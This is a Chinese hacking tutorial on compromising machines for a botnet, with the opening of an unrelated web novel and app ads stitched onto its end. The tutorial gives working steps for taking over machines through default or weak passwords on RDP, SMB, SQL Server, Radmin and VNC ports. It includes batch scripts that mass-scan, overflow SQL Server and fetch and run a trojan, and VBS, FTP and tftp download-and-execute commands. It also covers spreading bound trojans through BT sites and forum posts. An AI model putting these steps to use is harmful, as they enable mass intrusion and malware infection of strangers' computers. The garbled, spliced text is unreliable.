13389抓鸡
现在国内网络上流传着一种克隆版的XP,安装后会默认开启
一个账号为new,密码为空的账户,而且基本上都是开着3389的,
我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S
扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放
3389的机器(也可以把结果保存为文本文件,用批量生成3389
连接的工具来连接),然后输入账号new登入,如果别人的电
脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~
这种方法只针XP系统,如果遇到2000或者2003系统就不要试了
呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你
再登入上去就会把他挤出去(XP只支持单用户登入,用户登入
需要用工具开),或者电脑前有人你就不可能去打开IE下载木
马了。
2、扫135端口抓肉鸡
首先先用端口扫描器扫一段IP的135端口,然后把结果保存
,再用NTSCAN过滤有弱口令的机器,最后用recton开tel***传
马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的
135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画
可以去黑客网站搜索135)
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445
端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,
最后用啊D工具包开共享传马。因为现在135和445端口都被防
火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地
的445肉鸡来扫。(详细动画可以去黑客网站搜索445)
4、1433端口批量溢出抓肉鸡
这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已
经不高了。要用到的工具:S扫sqlhello.exenc.exe批处理文件
首先先写个批处理,打开记事本,把以下代码复制修改后,储
存为扫描+溢出.bat文件
@echooff
for/f&"eol=;tokens=1,2delims=&"%%iin(tt.txt)dos.exetcp%%i%%j
14331000/save
@echooff
for/f&"eol=;tokens=1delims=&"%%iin(Result.txt)dosqlhello%%i
1433xxx.xxx.xx.xx556m.XiaoShuo530.Com
还要新建一个tt.txt,里面你要扫的IP段,格式为
XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i
1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监
听的端口然后再写个批处理
@echooff
Nc-l-vv-p556>daima.txt
echousername>>daima.txt
echopassword>>daima.txt
echobin>>daima.txt(以2进制传输数据)
echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt
echobye>>daima.txt
***stopsharedaccess(关闭WINDOWS自带防火墙)
ftp-s:daima.txt
xxx.exe(也是填你木马的文件名)
deldaima.txt
注意上面的代码回车符别删掉,要不然就没法下你的马了。
几种肉鸡上传文件的方法
tftp法
先在自己某机器上建个tftp服务器,如执行tftpd32.exe,
再将文件(sample.exe)上传到别的机器中(肉鸡),
肉鸡cmd中执行:tftp-i服务器ipgetsample.exe
ftp法
肉鸡cmd中执行:
echoopenftp服务器ip[端口]>ftp.txt
echousername>>ftp.txt
echopassword>>ftp.txt
echogetsample.exe>>ftp.txt
echobye>>ftp.txt
ftp-s:ftp.txt
delftp.txt
工具法
利用wineggdrop的wget.exe
肉鸡cmd中执行:wget网站/sample.exe
利用dl.vbe法
肉鸡cmd中执行:
echowithwscript:if.arguments.count^<2then.quit:endif
>dl.vbe
echosetaso=.createobject(&"adodb.stream&"):set
web=createobject(&"microsoft.xmlhttp&")>>dl.vbe
echoweb.open&"get&",.arguments(0),0:web.send:if
web.status^>200thenquit>>dl.vbe
echo
aso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile
.arguments(1),2:endwith>dl.vbe
cscriptdl.vbehttp://*。*。*。*:88/sample.exesample.exe
利用iget.vbe法
方法同4,
肉鸡cmd中执行:
echoiLocal=LCase(WScript.Arguments(1))>iget.vbe
echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe
echoSetxPost=CreateObject(&"Microsoft.XMLHTTP&")
>>iget.vbe
echoxPost.Open&"GET&",iRemote,0>>iget.vbe
echoxPost.Send()>>iget.vbe
echoSetsGet=CreateObject(&"ADODB.Stream&")>>iget.vbe
echosGet.Mode=3>>iget.vbe
echosGet.Type=1>>iget.vbe
echosGet.Open()>>iget.vbe
echosGet.Write(xPost.responseBody)>>iget.vbe
echosGet.SaveToFileiLocal,2>>iget.vbe
cscriptiget.vbehttp://*。*。*。*/sample.exesample.exe
利用Http网站vbe法
echoSetxPost=CreateObject(&"Microsoft.XMLHTTP&")
>dsa.vbe
echoxPost.Open&"GET&",&"http://*.*.*.*/sample.exe&",0
>>dsa.vbe
echoxPost.Send()>>dsa.vbe
echoSetsGet=CreateObject(&"ADODB.Stream&")>>dsa.vbe
echosGet.Mode=3>>dsa.vbe
echosGet.Type=1>>dsa.vbe
echosGet.Open()>>dsa.vbe
echosGet.Write(xPost.responseBody)>>dsa.vbe
echosGet.SaveToFile&"sample.exe&",2>>dsa.vbecscript
dsa.vbe
deldsa.vbe
3389法
可以开3389,然后登陆,进行本地的下载。该方法对服务
器上传很严格的机器特有效。(包括硬件防火墙)
先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以
去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下
马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也
可以这样溢出,只要用这些端口的溢出工具就好了,详细动画
可以去黑客网站搜索1433。
忘了说,上面的工具和批处理什么的都要放在同一个文件
夹下。
先休息一下,打这么多字累死了
继续
5、扫1433抓肉鸡之方法2
要用到的工具:端口扫描器X-scanSQL综合利用工具
上面我们说过了,1433溢出现在成功率已经不高了,所以我
们可以用另一种方法。开了1433端口的机器一般都装了SQL,
所以我们可以猜测SQL弱口令来抓1433肉鸡。
首先先用端口扫描器扫一段IP的1433端口,然后结果保存为
文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描
参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了
,其他不要勾。然后在插件设置-端口相关设置-待检测端口这
一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会
有个报告,列出了有弱口令的机器,然后打开SQL综合利用工
具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-
利用目录,上传你的木马,然后在用DOS命令执行你的木马就
OK了。
6、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样,效率也没上面的高,只是想让大
家知道下,呵呵。
工具:WINNTAutoAttackSQL综合利用工具
打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下
的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA
账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马
执行就好了。
7、扫4899空口令抓肉鸡
工具:端口扫描器4899探测器Radmin
首先先用端口扫描器扫一段IP的4899端口,然后用4899探测
器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有
空口令的机器,带开文件管理,上传的你木马运行就OK了。
详细动画可以去黑客网站搜索4899
8、扫5900端口抓VNC肉鸡
工具:VNC扫描器VNC连接器
首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描
器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-
vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文
本文件,打开后有一列IP,IP后面的有一些单词比如
patched,banned,vulnerable,只有单词为vulnerable才能连接。接着
就用VNC连接器连接,下面就不用多说了吧?详细动画可以去
黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费
空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介
绍几种我会的。
1、BT挂马
顾名思义,就是把你的木马发布到BT网站让人下载。当然如
果只把单纯的木马文件发布上去效果肯定不好,而且现在一般
的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法
。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在
一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里
有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后
,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤
其是下XXX片的时候当然你也可以做个网页木马,然后把你网
页木马的地址插入到你发布的文件中(不是所有文件都可以这
样的,我只知道RM和EXE文件可以插入),别人下载打开后同
时也会带开你的网页木马,如果他的系统没有补供你网页木马
所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想
,我把木马和其他文件捆绑后格式保持为那个文件(比如RM
捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?
呵呵,如果真有这样的好事那我上面何不说把木马和BT种子
文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说
一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,
除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后
的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在
很少,大多都被补了,就算有别人也不一定会公开,为什么想
想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对
winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行
绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR
文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR
文件体积变小,减少的体积就为木马的体积。然后再次打开这
个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各
位赶快更新下WINRAR版本,小心中马哈。
2、免费空间挂马
其实和BT差不多,就是把做好的木马上传到你申请的免费空
间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点
是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。
我这几天就是这样挂的,弄个免费空间,上传个木马,到2个
XXX论坛发个帖子,每天睡前一顶。www.hookbase.***上面有好多可以学的,不清楚的问下我 有的人死了,但没有完全死……
无尽的昏迷过后,时宇猛地从床上起身。想要看最新章节内容,请下载爱阅小说app,无广告免费阅读最新章节内容。网站已经不更新最新章节内容,已经爱阅小说APP更新最新章节内容。
他大口的呼吸起新鲜的空气,胸口一颤一颤。
迷茫、不解,各种情绪涌上心头。
这是哪?
随后,时宇下意识观察四周,然后更茫然了。
一个单人宿舍?
就算他成功得到救援,现在也应该在病房才对。
还有自己的身体……怎么会一点伤也没有。
带着疑惑,时宇的视线快速从房间扫过,最终目光停留在了床头的一面镜子上。
镜子照出他现在的模样,大约十七八岁的年龄,外貌很帅。
可问题是,这不是他!下载爱阅小说app,阅读最新章节内容无广告免费
之前的自己,是一位二十多岁气宇不凡的帅气青年,工作有段时间了。
而现在,这相貌怎么看都只是高中生的年纪……
这个变化,让时宇发愣很久。
千万别告诉他,手术很成功……
身体、面貌都变了,这根本不是手术不手术的问题了,而是仙术。
他竟完全变成了另外一个人!
难道……是自己穿越了?
除了床头那摆放位置明显风水不好的镜子,时宇还在旁边发现了三本书。
时宇拿起一看,书名瞬间让他沉默。
《新手饲养员必备育兽手册》
《宠兽产后的护理》
《异种族兽耳娘评鉴指南》
时宇:???
前两本书的名字还算正常,最后一本你是怎么回事?
“咳。”
时宇目光一肃,伸出手来,不过很快手臂一僵。
就在他想翻开第三本书,看看这究竟是个什么东西时,他的大脑猛地一阵刺痛,大量的记忆如潮水般涌现。
冰原市。
宠兽饲养基地。
实习宠兽饲养员。网站即将关闭,下载爱阅app为您提供大神铁血悍馬H8的教你简单的黑客人门技术
御兽师?
章节错误,点此报送(免注册),
报送后维护人员会在两分钟内校正章节内容,请耐心等待